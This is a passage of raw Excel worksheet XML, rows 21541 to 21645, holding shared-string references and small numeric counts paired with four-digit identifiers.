        <v>5470</v>
      </c>
    </row>
    <row r="21541" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21541" t="s">
        <v>16231</v>
      </c>
      <c r="B21541" t="s">
        <v>16214</v>
      </c>
      <c r="C21541">
        <v>0</v>
      </c>
      <c r="D21541">
        <v>5470</v>
      </c>
    </row>
    <row r="21542" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21542" t="s">
        <v>16228</v>
      </c>
      <c r="B21542" t="s">
        <v>16215</v>
      </c>
      <c r="C21542">
        <v>2</v>
      </c>
      <c r="D21542">
        <v>5470</v>
      </c>
    </row>
    <row r="21543" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21543" t="s">
        <v>16231</v>
      </c>
      <c r="B21543" t="s">
        <v>16216</v>
      </c>
      <c r="C21543">
        <v>0</v>
      </c>
      <c r="D21543">
        <v>5470</v>
      </c>
    </row>
    <row r="21544" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21544" t="s">
        <v>16228</v>
      </c>
      <c r="B21544" t="s">
        <v>16217</v>
      </c>
      <c r="C21544">
        <v>0</v>
      </c>
      <c r="D21544">
        <v>5470</v>
      </c>
    </row>
    <row r="21545" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21545" t="s">
        <v>16231</v>
      </c>
      <c r="B21545" t="s">
        <v>16218</v>
      </c>
      <c r="C21545">
        <v>0</v>
      </c>
      <c r="D21545">
        <v>5470</v>
      </c>
    </row>
    <row r="21546" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21546" t="s">
        <v>16229</v>
      </c>
      <c r="B21546" t="s">
        <v>16219</v>
      </c>
      <c r="C21546">
        <v>3</v>
      </c>
      <c r="D21546">
        <v>5470</v>
      </c>
    </row>
    <row r="21547" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21547" t="s">
        <v>16230</v>
      </c>
      <c r="B21547" t="s">
        <v>16220</v>
      </c>
      <c r="C21547">
        <v>0</v>
      </c>
      <c r="D21547">
        <v>5470</v>
      </c>
    </row>
    <row r="21548" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21548" t="s">
        <v>16229</v>
      </c>
      <c r="B21548" t="s">
        <v>16221</v>
      </c>
      <c r="C21548">
        <v>0</v>
      </c>
      <c r="D21548">
        <v>5470</v>
      </c>
    </row>
    <row r="21549" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21549" t="s">
        <v>16230</v>
      </c>
      <c r="B21549" t="s">
        <v>16222</v>
      </c>
      <c r="C21549">
        <v>0</v>
      </c>
      <c r="D21549">
        <v>5470</v>
      </c>
    </row>
    <row r="21550" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21550" t="s">
        <v>16223</v>
      </c>
      <c r="B21550" t="s">
        <v>16223</v>
      </c>
      <c r="C21550">
        <v>27</v>
      </c>
      <c r="D21550">
        <v>5470</v>
      </c>
    </row>
    <row r="21551" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21551" t="s">
        <v>16224</v>
      </c>
      <c r="B21551" t="s">
        <v>16224</v>
      </c>
      <c r="C21551">
        <v>0</v>
      </c>
      <c r="D21551">
        <v>5470</v>
      </c>
    </row>
    <row r="21552" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21552" t="s">
        <v>16228</v>
      </c>
      <c r="B21552" t="s">
        <v>16211</v>
      </c>
      <c r="C21552">
        <v>0</v>
      </c>
      <c r="D21552">
        <v>5719</v>
      </c>
    </row>
    <row r="21553" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21553" t="s">
        <v>16231</v>
      </c>
      <c r="B21553" t="s">
        <v>16212</v>
      </c>
      <c r="C21553">
        <v>0</v>
      </c>
      <c r="D21553">
        <v>5719</v>
      </c>
    </row>
    <row r="21554" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21554" t="s">
        <v>16228</v>
      </c>
      <c r="B21554" t="s">
        <v>16213</v>
      </c>
      <c r="C21554">
        <v>0</v>
      </c>
      <c r="D21554">
        <v>5719</v>
      </c>
    </row>
    <row r="21555" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21555" t="s">
        <v>16231</v>
      </c>
      <c r="B21555" t="s">
        <v>16214</v>
      </c>
      <c r="C21555">
        <v>0</v>
      </c>
      <c r="D21555">
        <v>5719</v>
      </c>
    </row>
    <row r="21556" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21556" t="s">
        <v>16228</v>
      </c>
      <c r="B21556" t="s">
        <v>16215</v>
      </c>
      <c r="C21556">
        <v>5</v>
      </c>
      <c r="D21556">
        <v>5719</v>
      </c>
    </row>
    <row r="21557" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21557" t="s">
        <v>16231</v>
      </c>
      <c r="B21557" t="s">
        <v>16216</v>
      </c>
      <c r="C21557">
        <v>5</v>
      </c>
      <c r="D21557">
        <v>5719</v>
      </c>
    </row>
    <row r="21558" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21558" t="s">
        <v>16228</v>
      </c>
      <c r="B21558" t="s">
        <v>16217</v>
      </c>
      <c r="C21558">
        <v>10</v>
      </c>
      <c r="D21558">
        <v>5719</v>
      </c>
    </row>
    <row r="21559" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21559" t="s">
        <v>16231</v>
      </c>
      <c r="B21559" t="s">
        <v>16218</v>
      </c>
      <c r="C21559">
        <v>20</v>
      </c>
      <c r="D21559">
        <v>5719</v>
      </c>
    </row>
    <row r="21560" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21560" t="s">
        <v>16229</v>
      </c>
      <c r="B21560" t="s">
        <v>16219</v>
      </c>
      <c r="C21560">
        <v>0</v>
      </c>
      <c r="D21560">
        <v>5719</v>
      </c>
    </row>
    <row r="21561" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21561" t="s">
        <v>16230</v>
      </c>
      <c r="B21561" t="s">
        <v>16220</v>
      </c>
      <c r="C21561">
        <v>0</v>
      </c>
      <c r="D21561">
        <v>5719</v>
      </c>
    </row>
    <row r="21562" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21562" t="s">
        <v>16229</v>
      </c>
      <c r="B21562" t="s">
        <v>16221</v>
      </c>
      <c r="C21562">
        <v>5</v>
      </c>
      <c r="D21562">
        <v>5719</v>
      </c>
    </row>
    <row r="21563" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21563" t="s">
        <v>16230</v>
      </c>
      <c r="B21563" t="s">
        <v>16222</v>
      </c>
      <c r="C21563">
        <v>15</v>
      </c>
      <c r="D21563">
        <v>5719</v>
      </c>
    </row>
    <row r="21564" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21564" t="s">
        <v>16223</v>
      </c>
      <c r="B21564" t="s">
        <v>16223</v>
      </c>
      <c r="C21564">
        <v>20</v>
      </c>
      <c r="D21564">
        <v>5719</v>
      </c>
    </row>
    <row r="21565" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21565" t="s">
        <v>16224</v>
      </c>
      <c r="B21565" t="s">
        <v>16224</v>
      </c>
      <c r="C21565">
        <v>1</v>
      </c>
      <c r="D21565">
        <v>5719</v>
      </c>
    </row>
    <row r="21566" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21566" t="s">
        <v>16231</v>
      </c>
      <c r="B21566" t="s">
        <v>16216</v>
      </c>
      <c r="C21566">
        <v>3</v>
      </c>
      <c r="D21566">
        <v>1776</v>
      </c>
    </row>
    <row r="21567" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21567" t="s">
        <v>16228</v>
      </c>
      <c r="B21567" t="s">
        <v>16217</v>
      </c>
      <c r="C21567">
        <v>13</v>
      </c>
      <c r="D21567">
        <v>1776</v>
      </c>
    </row>
    <row r="21568" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21568" t="s">
        <v>16231</v>
      </c>
      <c r="B21568" t="s">
        <v>16218</v>
      </c>
      <c r="C21568">
        <v>9</v>
      </c>
      <c r="D21568">
        <v>1776</v>
      </c>
    </row>
    <row r="21569" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21569" t="s">
        <v>16230</v>
      </c>
      <c r="B21569" t="s">
        <v>16222</v>
      </c>
      <c r="C21569">
        <v>40</v>
      </c>
      <c r="D21569">
        <v>1776</v>
      </c>
    </row>
    <row r="21570" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21570" t="s">
        <v>16228</v>
      </c>
      <c r="B21570" t="s">
        <v>16211</v>
      </c>
      <c r="C21570">
        <v>0</v>
      </c>
      <c r="D21570">
        <v>5754</v>
      </c>
    </row>
    <row r="21571" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21571" t="s">
        <v>16231</v>
      </c>
      <c r="B21571" t="s">
        <v>16212</v>
      </c>
      <c r="C21571">
        <v>0</v>
      </c>
      <c r="D21571">
        <v>5754</v>
      </c>
    </row>
    <row r="21572" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21572" t="s">
        <v>16228</v>
      </c>
      <c r="B21572" t="s">
        <v>16213</v>
      </c>
      <c r="C21572">
        <v>0</v>
      </c>
      <c r="D21572">
        <v>5754</v>
      </c>
    </row>
    <row r="21573" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21573" t="s">
        <v>16231</v>
      </c>
      <c r="B21573" t="s">
        <v>16214</v>
      </c>
      <c r="C21573">
        <v>0</v>
      </c>
      <c r="D21573">
        <v>5754</v>
      </c>
    </row>
    <row r="21574" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21574" t="s">
        <v>16228</v>
      </c>
      <c r="B21574" t="s">
        <v>16215</v>
      </c>
      <c r="C21574">
        <v>1</v>
      </c>
      <c r="D21574">
        <v>5754</v>
      </c>
    </row>
    <row r="21575" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21575" t="s">
        <v>16231</v>
      </c>
      <c r="B21575" t="s">
        <v>16216</v>
      </c>
      <c r="C21575">
        <v>1</v>
      </c>
      <c r="D21575">
        <v>5754</v>
      </c>
    </row>
    <row r="21576" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21576" t="s">
        <v>16228</v>
      </c>
      <c r="B21576" t="s">
        <v>16217</v>
      </c>
      <c r="C21576">
        <v>2</v>
      </c>
      <c r="D21576">
        <v>5754</v>
      </c>
    </row>
    <row r="21577" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21577" t="s">
        <v>16231</v>
      </c>
      <c r="B21577" t="s">
        <v>16218</v>
      </c>
      <c r="C21577">
        <v>0</v>
      </c>
      <c r="D21577">
        <v>5754</v>
      </c>
    </row>
    <row r="21578" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21578" t="s">
        <v>16229</v>
      </c>
      <c r="B21578" t="s">
        <v>16219</v>
      </c>
      <c r="C21578">
        <v>0</v>
      </c>
      <c r="D21578">
        <v>5754</v>
      </c>
    </row>
    <row r="21579" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21579" t="s">
        <v>16230</v>
      </c>
      <c r="B21579" t="s">
        <v>16220</v>
      </c>
      <c r="C21579">
        <v>0</v>
      </c>
      <c r="D21579">
        <v>5754</v>
      </c>
    </row>
    <row r="21580" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21580" t="s">
        <v>16229</v>
      </c>
      <c r="B21580" t="s">
        <v>16221</v>
      </c>
      <c r="C21580">
        <v>2</v>
      </c>
      <c r="D21580">
        <v>5754</v>
      </c>
    </row>
    <row r="21581" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21581" t="s">
        <v>16230</v>
      </c>
      <c r="B21581" t="s">
        <v>16222</v>
      </c>
      <c r="C21581">
        <v>0</v>
      </c>
      <c r="D21581">
        <v>5754</v>
      </c>
    </row>
    <row r="21582" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21582" t="s">
        <v>16223</v>
      </c>
      <c r="B21582" t="s">
        <v>16223</v>
      </c>
      <c r="C21582">
        <v>30</v>
      </c>
      <c r="D21582">
        <v>5754</v>
      </c>
    </row>
    <row r="21583" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21583" t="s">
        <v>16224</v>
      </c>
      <c r="B21583" t="s">
        <v>16224</v>
      </c>
      <c r="C21583">
        <v>1</v>
      </c>
      <c r="D21583">
        <v>5754</v>
      </c>
    </row>
    <row r="21584" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21584" t="s">
        <v>16228</v>
      </c>
      <c r="B21584" t="s">
        <v>16211</v>
      </c>
      <c r="C21584">
        <v>0</v>
      </c>
      <c r="D21584">
        <v>5786</v>
      </c>
    </row>
    <row r="21585" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21585" t="s">
        <v>16231</v>
      </c>
      <c r="B21585" t="s">
        <v>16212</v>
      </c>
      <c r="C21585">
        <v>0</v>
      </c>
      <c r="D21585">
        <v>5786</v>
      </c>
    </row>
    <row r="21586" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21586" t="s">
        <v>16228</v>
      </c>
      <c r="B21586" t="s">
        <v>16213</v>
      </c>
      <c r="C21586">
        <v>0</v>
      </c>
      <c r="D21586">
        <v>5786</v>
      </c>
    </row>
    <row r="21587" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21587" t="s">
        <v>16231</v>
      </c>
      <c r="B21587" t="s">
        <v>16214</v>
      </c>
      <c r="C21587">
        <v>0</v>
      </c>
      <c r="D21587">
        <v>5786</v>
      </c>
    </row>
    <row r="21588" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21588" t="s">
        <v>16228</v>
      </c>
      <c r="B21588" t="s">
        <v>16215</v>
      </c>
      <c r="C21588">
        <v>0</v>
      </c>
      <c r="D21588">
        <v>5786</v>
      </c>
    </row>
    <row r="21589" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21589" t="s">
        <v>16231</v>
      </c>
      <c r="B21589" t="s">
        <v>16216</v>
      </c>
      <c r="C21589">
        <v>0</v>
      </c>
      <c r="D21589">
        <v>5786</v>
      </c>
    </row>
    <row r="21590" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21590" t="s">
        <v>16228</v>
      </c>
      <c r="B21590" t="s">
        <v>16217</v>
      </c>
      <c r="C21590">
        <v>0</v>
      </c>
      <c r="D21590">
        <v>5786</v>
      </c>
    </row>
    <row r="21591" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21591" t="s">
        <v>16231</v>
      </c>
      <c r="B21591" t="s">
        <v>16218</v>
      </c>
      <c r="C21591">
        <v>0</v>
      </c>
      <c r="D21591">
        <v>5786</v>
      </c>
    </row>
    <row r="21592" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21592" t="s">
        <v>16229</v>
      </c>
      <c r="B21592" t="s">
        <v>16219</v>
      </c>
      <c r="C21592">
        <v>0</v>
      </c>
      <c r="D21592">
        <v>5786</v>
      </c>
    </row>
    <row r="21593" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21593" t="s">
        <v>16230</v>
      </c>
      <c r="B21593" t="s">
        <v>16220</v>
      </c>
      <c r="C21593">
        <v>0</v>
      </c>
      <c r="D21593">
        <v>5786</v>
      </c>
    </row>
    <row r="21594" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21594" t="s">
        <v>16229</v>
      </c>
      <c r="B21594" t="s">
        <v>16221</v>
      </c>
      <c r="C21594">
        <v>3</v>
      </c>
      <c r="D21594">
        <v>5786</v>
      </c>
    </row>
    <row r="21595" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21595" t="s">
        <v>16230</v>
      </c>
      <c r="B21595" t="s">
        <v>16222</v>
      </c>
      <c r="C21595">
        <v>0</v>
      </c>
      <c r="D21595">
        <v>5786</v>
      </c>
    </row>
    <row r="21596" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21596" t="s">
        <v>16223</v>
      </c>
      <c r="B21596" t="s">
        <v>16223</v>
      </c>
      <c r="C21596">
        <v>16</v>
      </c>
      <c r="D21596">
        <v>5786</v>
      </c>
    </row>
    <row r="21597" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21597" t="s">
        <v>16224</v>
      </c>
      <c r="B21597" t="s">
        <v>16224</v>
      </c>
      <c r="C21597">
        <v>1</v>
      </c>
      <c r="D21597">
        <v>5786</v>
      </c>
    </row>
    <row r="21598" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21598" t="s">
        <v>16228</v>
      </c>
      <c r="B21598" t="s">
        <v>16211</v>
      </c>
      <c r="C21598">
        <v>0</v>
      </c>
      <c r="D21598">
        <v>5595</v>
      </c>
    </row>
    <row r="21599" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21599" t="s">
        <v>16231</v>
      </c>
      <c r="B21599" t="s">
        <v>16212</v>
      </c>
      <c r="C21599">
        <v>0</v>
      </c>
      <c r="D21599">
        <v>5595</v>
      </c>
    </row>
    <row r="21600" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21600" t="s">
        <v>16228</v>
      </c>
      <c r="B21600" t="s">
        <v>16213</v>
      </c>
      <c r="C21600">
        <v>0</v>
      </c>
      <c r="D21600">
        <v>5595</v>
      </c>
    </row>
    <row r="21601" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21601" t="s">
        <v>16231</v>
      </c>
      <c r="B21601" t="s">
        <v>16214</v>
      </c>
      <c r="C21601">
        <v>0</v>
      </c>
      <c r="D21601">
        <v>5595</v>
      </c>
    </row>
    <row r="21602" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21602" t="s">
        <v>16228</v>
      </c>
      <c r="B21602" t="s">
        <v>16215</v>
      </c>
      <c r="C21602">
        <v>0</v>
      </c>
      <c r="D21602">
        <v>5595</v>
      </c>
    </row>
    <row r="21603" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21603" t="s">
        <v>16231</v>
      </c>
      <c r="B21603" t="s">
        <v>16216</v>
      </c>
      <c r="C21603">
        <v>0</v>
      </c>
      <c r="D21603">
        <v>5595</v>
      </c>
    </row>
    <row r="21604" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21604" t="s">
        <v>16228</v>
      </c>
      <c r="B21604" t="s">
        <v>16217</v>
      </c>
      <c r="C21604">
        <v>1</v>
      </c>
      <c r="D21604">
        <v>5595</v>
      </c>
    </row>
    <row r="21605" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21605" t="s">
        <v>16231</v>
      </c>
      <c r="B21605" t="s">
        <v>16218</v>
      </c>
      <c r="C21605">
        <v>0</v>
      </c>
      <c r="D21605">
        <v>5595</v>
      </c>
    </row>
    <row r="21606" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21606" t="s">
        <v>16229</v>
      </c>
      <c r="B21606" t="s">
        <v>16219</v>
      </c>
      <c r="C21606">
        <v>0</v>
      </c>
      <c r="D21606">
        <v>5595</v>
      </c>
    </row>
    <row r="21607" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21607" t="s">
        <v>16230</v>
      </c>
      <c r="B21607" t="s">
        <v>16220</v>
      </c>
      <c r="C21607">
        <v>0</v>
      </c>
      <c r="D21607">
        <v>5595</v>
      </c>
    </row>
    <row r="21608" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21608" t="s">
        <v>16229</v>
      </c>
      <c r="B21608" t="s">
        <v>16221</v>
      </c>
      <c r="C21608">
        <v>0</v>
      </c>
      <c r="D21608">
        <v>5595</v>
      </c>
    </row>
    <row r="21609" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21609" t="s">
        <v>16230</v>
      </c>
      <c r="B21609" t="s">
        <v>16222</v>
      </c>
      <c r="C21609">
        <v>0</v>
      </c>
      <c r="D21609">
        <v>5595</v>
      </c>
    </row>
    <row r="21610" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21610" t="s">
        <v>16223</v>
      </c>
      <c r="B21610" t="s">
        <v>16223</v>
      </c>
      <c r="C21610">
        <v>25</v>
      </c>
      <c r="D21610">
        <v>5595</v>
      </c>
    </row>
    <row r="21611" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21611" t="s">
        <v>16224</v>
      </c>
      <c r="B21611" t="s">
        <v>16224</v>
      </c>
      <c r="C21611">
        <v>1</v>
      </c>
      <c r="D21611">
        <v>5595</v>
      </c>
    </row>
    <row r="21612" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21612" t="s">
        <v>16228</v>
      </c>
      <c r="B21612" t="s">
        <v>16211</v>
      </c>
      <c r="C21612">
        <v>0</v>
      </c>
      <c r="D21612">
        <v>5038</v>
      </c>
    </row>
    <row r="21613" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21613" t="s">
        <v>16231</v>
      </c>
      <c r="B21613" t="s">
        <v>16212</v>
      </c>
      <c r="C21613">
        <v>0</v>
      </c>
      <c r="D21613">
        <v>5038</v>
      </c>
    </row>
    <row r="21614" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21614" t="s">
        <v>16228</v>
      </c>
      <c r="B21614" t="s">
        <v>16213</v>
      </c>
      <c r="C21614">
        <v>1</v>
      </c>
      <c r="D21614">
        <v>5038</v>
      </c>
    </row>
    <row r="21615" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21615" t="s">
        <v>16231</v>
      </c>
      <c r="B21615" t="s">
        <v>16214</v>
      </c>
      <c r="C21615">
        <v>1</v>
      </c>
      <c r="D21615">
        <v>5038</v>
      </c>
    </row>
    <row r="21616" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21616" t="s">
        <v>16228</v>
      </c>
      <c r="B21616" t="s">
        <v>16215</v>
      </c>
      <c r="C21616">
        <v>5</v>
      </c>
      <c r="D21616">
        <v>5038</v>
      </c>
    </row>
    <row r="21617" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21617" t="s">
        <v>16231</v>
      </c>
      <c r="B21617" t="s">
        <v>16216</v>
      </c>
      <c r="C21617">
        <v>10</v>
      </c>
      <c r="D21617">
        <v>5038</v>
      </c>
    </row>
    <row r="21618" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21618" t="s">
        <v>16228</v>
      </c>
      <c r="B21618" t="s">
        <v>16217</v>
      </c>
      <c r="C21618">
        <v>47</v>
      </c>
      <c r="D21618">
        <v>5038</v>
      </c>
    </row>
    <row r="21619" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21619" t="s">
        <v>16231</v>
      </c>
      <c r="B21619" t="s">
        <v>16218</v>
      </c>
      <c r="C21619">
        <v>10</v>
      </c>
      <c r="D21619">
        <v>5038</v>
      </c>
    </row>
    <row r="21620" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21620" t="s">
        <v>16229</v>
      </c>
      <c r="B21620" t="s">
        <v>16219</v>
      </c>
      <c r="C21620">
        <v>0</v>
      </c>
      <c r="D21620">
        <v>5038</v>
      </c>
    </row>
    <row r="21621" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21621" t="s">
        <v>16230</v>
      </c>
      <c r="B21621" t="s">
        <v>16220</v>
      </c>
      <c r="C21621">
        <v>1</v>
      </c>
      <c r="D21621">
        <v>5038</v>
      </c>
    </row>
    <row r="21622" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21622" t="s">
        <v>16229</v>
      </c>
      <c r="B21622" t="s">
        <v>16221</v>
      </c>
      <c r="C21622">
        <v>15</v>
      </c>
      <c r="D21622">
        <v>5038</v>
      </c>
    </row>
    <row r="21623" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21623" t="s">
        <v>16230</v>
      </c>
      <c r="B21623" t="s">
        <v>16222</v>
      </c>
      <c r="C21623">
        <v>9</v>
      </c>
      <c r="D21623">
        <v>5038</v>
      </c>
    </row>
    <row r="21624" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21624" t="s">
        <v>16223</v>
      </c>
      <c r="B21624" t="s">
        <v>16223</v>
      </c>
      <c r="C21624">
        <v>26</v>
      </c>
      <c r="D21624">
        <v>5038</v>
      </c>
    </row>
    <row r="21625" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21625" t="s">
        <v>16224</v>
      </c>
      <c r="B21625" t="s">
        <v>16224</v>
      </c>
      <c r="C21625">
        <v>1</v>
      </c>
      <c r="D21625">
        <v>5038</v>
      </c>
    </row>
    <row r="21626" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21626" t="s">
        <v>16228</v>
      </c>
      <c r="B21626" t="s">
        <v>16211</v>
      </c>
      <c r="C21626">
        <v>0</v>
      </c>
      <c r="D21626">
        <v>5772</v>
      </c>
    </row>
    <row r="21627" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21627" t="s">
        <v>16231</v>
      </c>
      <c r="B21627" t="s">
        <v>16212</v>
      </c>
      <c r="C21627">
        <v>0</v>
      </c>
      <c r="D21627">
        <v>5772</v>
      </c>
    </row>
    <row r="21628" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21628" t="s">
        <v>16228</v>
      </c>
      <c r="B21628" t="s">
        <v>16213</v>
      </c>
      <c r="C21628">
        <v>0</v>
      </c>
      <c r="D21628">
        <v>5772</v>
      </c>
    </row>
    <row r="21629" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21629" t="s">
        <v>16231</v>
      </c>
      <c r="B21629" t="s">
        <v>16214</v>
      </c>
      <c r="C21629">
        <v>0</v>
      </c>
      <c r="D21629">
        <v>5772</v>
      </c>
    </row>
    <row r="21630" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21630" t="s">
        <v>16228</v>
      </c>
      <c r="B21630" t="s">
        <v>16215</v>
      </c>
      <c r="C21630">
        <v>12</v>
      </c>
      <c r="D21630">
        <v>5772</v>
      </c>
    </row>
    <row r="21631" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21631" t="s">
        <v>16231</v>
      </c>
      <c r="B21631" t="s">
        <v>16216</v>
      </c>
      <c r="C21631">
        <v>1</v>
      </c>
      <c r="D21631">
        <v>5772</v>
      </c>
    </row>
    <row r="21632" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21632" t="s">
        <v>16228</v>
      </c>
      <c r="B21632" t="s">
        <v>16217</v>
      </c>
      <c r="C21632">
        <v>1</v>
      </c>
      <c r="D21632">
        <v>5772</v>
      </c>
    </row>
    <row r="21633" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21633" t="s">
        <v>16231</v>
      </c>
      <c r="B21633" t="s">
        <v>16218</v>
      </c>
      <c r="C21633">
        <v>0</v>
      </c>
      <c r="D21633">
        <v>5772</v>
      </c>
    </row>
    <row r="21634" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21634" t="s">
        <v>16229</v>
      </c>
      <c r="B21634" t="s">
        <v>16219</v>
      </c>
      <c r="C21634">
        <v>1</v>
      </c>
      <c r="D21634">
        <v>5772</v>
      </c>
    </row>
    <row r="21635" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21635" t="s">
        <v>16230</v>
      </c>
      <c r="B21635" t="s">
        <v>16220</v>
      </c>
      <c r="C21635">
        <v>0</v>
      </c>
      <c r="D21635">
        <v>5772</v>
      </c>
    </row>
    <row r="21636" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21636" t="s">
        <v>16229</v>
      </c>
      <c r="B21636" t="s">
        <v>16221</v>
      </c>
      <c r="C21636">
        <v>2</v>
      </c>
      <c r="D21636">
        <v>5772</v>
      </c>
    </row>
    <row r="21637" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21637" t="s">
        <v>16230</v>
      </c>
      <c r="B21637" t="s">
        <v>16222</v>
      </c>
      <c r="C21637">
        <v>0</v>
      </c>
      <c r="D21637">
        <v>5772</v>
      </c>
    </row>
    <row r="21638" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21638" t="s">
        <v>16223</v>
      </c>
      <c r="B21638" t="s">
        <v>16223</v>
      </c>
      <c r="C21638">
        <v>0</v>
      </c>
      <c r="D21638">
        <v>5772</v>
      </c>
    </row>
    <row r="21639" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21639" t="s">
        <v>16224</v>
      </c>
      <c r="B21639" t="s">
        <v>16224</v>
      </c>
      <c r="C21639">
        <v>0</v>
      </c>
      <c r="D21639">
        <v>5772</v>
      </c>
    </row>
    <row r="21640" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21640" t="s">
        <v>16228</v>
      </c>
      <c r="B21640" t="s">
        <v>16211</v>
      </c>
      <c r="C21640">
        <v>0</v>
      </c>
      <c r="D21640">
        <v>2202</v>
      </c>
    </row>
    <row r="21641" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21641" t="s">
        <v>16231</v>
      </c>
      <c r="B21641" t="s">
        <v>16212</v>
      </c>
      <c r="C21641">
        <v>0</v>
      </c>
      <c r="D21641">
        <v>2202</v>
      </c>
    </row>
    <row r="21642" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21642" t="s">
        <v>16228</v>
      </c>
      <c r="B21642" t="s">
        <v>16213</v>
      </c>
      <c r="C21642">
        <v>0</v>
      </c>
      <c r="D21642">
        <v>2202</v>
      </c>
    </row>
    <row r="21643" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21643" t="s">
        <v>16231</v>
      </c>
      <c r="B21643" t="s">
        <v>16214</v>
      </c>
      <c r="C21643">
        <v>0</v>
      </c>
      <c r="D21643">
        <v>2202</v>
      </c>
    </row>
    <row r="21644" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21644" t="s">
        <v>16228</v>
      </c>
      <c r="B21644" t="s">
        <v>16215</v>
      </c>
      <c r="C21644">
        <v>1</v>
      </c>
      <c r="D21644">
        <v>2202</v>
      </c>
    </row>
    <row r="21645" spans="1:4" x14ac:dyDescent="0.2">
      <c r="A21645" t="s">
        <v>16231</v>
      </c>
      <c r="B21645" t="s">
        <v>16216</v>
      </c>
      <c r="C21645">
        <v>1</v>
